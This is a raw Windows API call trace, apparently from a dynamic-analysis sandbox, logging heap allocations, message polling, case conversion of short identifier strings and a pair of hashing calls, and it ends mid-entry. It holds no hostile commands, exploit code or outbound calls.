[0262.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.184] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.184] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.184] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.184] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.184] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.184] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0262.184] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.185] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.185] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.185] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.185] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.185] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.185] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.186] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.186] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.186] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.186] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.186] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.186] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.186] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.186] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.187] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.187] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.187] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.187] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.187] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.187] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.188] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.188] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.188] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.188] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.188] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.189] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0262.189] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.191] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0262.191] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.192] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.192] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.192] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.192] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.193] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.193] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.193] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.193] CryptHashData (hHash=0xaa59a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0262.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.194] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.195] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.195] 